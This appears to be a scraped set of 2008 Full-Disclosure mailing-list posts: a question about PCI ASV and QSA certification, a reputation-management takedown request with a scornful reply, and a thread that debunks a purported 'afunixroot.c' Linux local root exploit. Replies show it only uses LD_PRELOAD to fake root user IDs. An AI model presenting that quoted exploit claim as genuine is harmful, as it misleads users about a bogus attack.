Version: GnuPG v1.4.5 (Darwin)
iD8DBQFHnfqLPlVbrK39S+4RAtl1AJ0bZ/cu1NdLqXqTdGuIkkMRjbR/+wCfWj+J
ZzSCqSWic8q2fd/zvw99WSg=
=jTB6
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] asking about certificate
Actually the QSA is for the employee... the QSC & ASV is for the company. In order for a person to have/keep/maintain their QSA cert, they must work for QSC. If a QSA quits working for a QSC, they no longer have their QSA certification.-Jeff WilderCISSP,QSA,CCE,C/EH-BEGIN GEEK CODE BLOCK-Version: 3.1GIT/CM/CS/O d- s:+ a C+++ UH++ P L++ E- w-- N+++ o-- K- w O- M--V-- PS+ PE- Y++ PGP++ t+ 5- X-- R* tv b++ DI++ D++G e* h--- r- y+++*--END GEEK CODE BLOCK-- From: [EMAIL PROTECTED]: [EMAIL PROTECTED]; [EMAIL PROTECTED]: Mon, 28 Jan 2008 07:44:22 +1000Subject: Re: [Full-disclosure] asking about certificate Follow the links at https://www.pcisecuritystandards.org/index.htm Note - AVS applies to the company, not an individual. QSA certification applies to both the company and the individual. lyalc -Original Message-From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of shadow floatingSent: Monday, 28 January 2008 6:42 AMTo: [EMAIL PROTECTED]: [Full-disclosure] asking about certificateHi all,i'm required to certify for ASV pci-dss certification, can anyone provide me with any information about this certificate?thanks alotregards, ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] 0day LINUX 0day LATEST
i'm a moron that can printf ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] A friendly request on behalf of Bart Cilfone
Sorry Mr.Cilfone, This is the interweb and your laws mean nothing here. Go try to spook someone else. On Jan 28, 2008 8:23 AM, Donald Republic <[EMAIL PROTECTED]> wrote: > Dear Full Disclosure, > > We are writing to you in behalf of Bart Cilfone. He has asked us to > contact you and see if you will consider removing the content about him at: > > http://seclists.org/fulldisclosure/2008/Jan/0497.html > > Please allow us to introduce ourselves. We are ReputationDefender, Inc., a > company dedicated to helping our clients preserve their good name on the > Internet. Our founders and employees are all regular Internet users. Like > our clients, and perhaps like you, we think the Internet is sometimes > unnecessarily hurtful to the privacy and reputations of everyday people. > Even content that is meant to be informative can sometimes have a > significant and negative impact on someone's job prospects, student > applications, and personal life. We invite you to learn more about who we > are, at www.reputationdefender.com. > > When our clients sign up with our service, we undertake deep research > about them on the Internet to see what the Web is saying about them. We find > sites where they are discussed, and we ask our clients how they feel about > those sites. Sometimes our clients express strong reservations about the > content on particular websites. They may feel hurt, ashamed, or "invaded" by > the content about them on those sites. > > As you may know, more and more prospective employers, universities, and > newfound friends and romantic interests undertake Internet research, and the > material they find can strongly impact their impressions of the people they > are getting to know. When people apply for jobs, apply for college or > graduate school, apply for loans, begin dating, or seek to do any number of > other things with their lives, hurtful content about them on the Internet > can have a negative impact on their opportunities. At some point or another, > most of us say things about ourselves or our friends and acquaintances we > later regret. We're all human, and we all do it! > > We are writing to you today because our client, Bart Cilfone, has told us > that he would like the content about him on your website to be removed as it > is outdated and disturbing to him. Would you be willing to remove or alter > the content? It would mean so much to Mr. Cilfone, and to us. Considerate > actions such as these will go a long way to help make the Internet a more > civil place. > > Thank you very much for your consideration. We are mindful that matters > like these can be sensitive. We appreciate your time. > > Please let us know if you have removed or changed the content on this site > by sending an e-mail to: [EMAIL PROTECTED] > > > Yours sincerely, > > Donald Republic > Reputation Defender Service Team > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -- "If you see me laughing, you better have backups" ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] 0day LINUX 0day LATEST
On Monday 28 January 2008, [EMAIL PROTECTED] wrote: > /* !!PRIVATE !!PRIVATE !!PRIVATE !!PRIVATE !!PRIVATE !!PRIVATE > * > * afunixroot.c Linux kernel 2.6.x i386 local root exploit that's kinda cute. a hack on 'leet hax0rs' (lol). An inverse rootkit, if you will. Not really hiding the fact that you have pwned a box, but hiding the fact that you haven't... lame? way. but humorous. @ -- VmkgVmVyaSBWZW5pdmVyc3VtIFZpdnVzIFZpY2kgLSBpbWRiCg== signature.asc Description: This is a digitally signed message part. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] A friendly request on behalf of Bart Cilfone
Dear Full Disclosure, We are writing to you in behalf of Bart Cilfone. He has asked us to contact you and see if you will consider removing the content about him at: http://seclists.org/fulldisclosure/2008/Jan/0497.html Please allow us to introduce ourselves. We are ReputationDefender, Inc., a company dedicated to helping our clients preserve their good name on the Internet. Our founders and employees are all regular Internet users. Like our clients, and perhaps like you, we think the Internet is sometimes unnecessarily hurtful to the privacy and reputations of everyday people. Even content that is meant to be informative can sometimes have a significant and negative impact on someone's job prospects, student applications, and personal life. We invite you to learn more about who we are, at www.reputationdefender.com. When our clients sign up with our service, we undertake deep research about them on the Internet to see what the Web is saying about them. We find sites where they are discussed, and we ask our clients how they feel about those sites. Sometimes our clients express strong reservations about the content on particular websites. They may feel hurt, ashamed, or "invaded" by the content about them on those sites. As you may know, more and more prospective employers, universities, and newfound friends and romantic interests undertake Internet research, and the material they find can strongly impact their impressions of the people they are getting to know. When people apply for jobs, apply for college or graduate school, apply for loans, begin dating, or seek to do any number of other things with their lives, hurtful content about them on the Internet can have a negative impact on their opportunities. At some point or another, most of us say things about ourselves or our friends and acquaintances we later regret. We're all human, and we all do it! We are writing to you today because our client, Bart Cilfone, has told us that he would like the content about him on your website to be removed as it is outdated and disturbing to him. Would you be willing to remove or alter the content? It would mean so much to Mr. Cilfone, and to us. Considerate actions such as these will go a long way to help make the Internet a more civil place. Thank you very much for your consideration. We are mindful that matters like these can be sensitive. We appreciate your time. Please let us know if you have removed or changed the content on this site by sending an e-mail to: [EMAIL PROTECTED] Yours sincerely, Donald Republic Reputation Defender Service Team ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] 0day LINUX 0day LATEST
On 28 Jan 08, at 02:13, wejwklekl246 wrote:
> /* !!PRIVATE !!PRIVATE !!PRIVATE !!PRIVATE !!PRIVATE !!PRIVATE
> *
> * afunixroot.c Linux kernel 2.6.x i386 local root exploit
Compiles a shared library in /tmp/own.so containing the functions
int getuid() { return 0; }
int geteuid() { return 0; }
int getgid() { return 0; }
int getegid() { return 0; }
and executes /bin/sh with LD_PRELOAD=/tmp/own.so
Pretty lame. Protip: "hellc0de" containing lots of \x61-\x7f looks fake.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
